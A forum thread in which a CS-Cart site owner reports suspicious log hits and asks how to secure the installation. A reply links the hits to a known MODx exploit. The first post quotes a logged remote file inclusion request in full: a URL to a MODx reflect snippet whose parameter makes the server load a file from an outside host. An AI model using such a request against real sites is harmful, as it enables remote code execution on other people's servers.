Ive noticed a number of hits on this url by looking at the logs in the admin area of CS cart 2. x
[url]http://109.203.99.180/~watercoo/~watercoo//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://arbotanya.hu/u2_one/byid.txt?[/url]
if you take a look at the end bit where it takes you to
[url]http://arbotanya.hu/[/url]
takes you to a site that seems to be running a script from my area?
So what i think has happened here is that the developers (indianeleite) have done another install and perhaps are using the assets and scripts in that area for third party sites.
Can anyone make a suggestion on what to do in situations like this or have I got this completely wrong?
Thanks
(and apologies if I have missed out any information)
Only if you use this application
http://modxcms.com/forums/
Google ‘http://www.milw0rm.com/exploits/7204’ for more information.
So in other words, not a good thing.
The install of cs cart has been done in the root and so im wondering why there is a ~watercoo directory.
I don’t have FTP access at the moment however I did some digging.
It seems that indianelite ([url]http://www.phpmysqlexperts.com/[/url]) sent a screen share request to someone in russia to solve a problem (again logs are a blessing for this) and I suspect that as it went to a .RU e-mail address thats where the issue is.
Whats the best way to make sure that all the security settings are in place? Is there a mod that checks the installation CHMOD settings?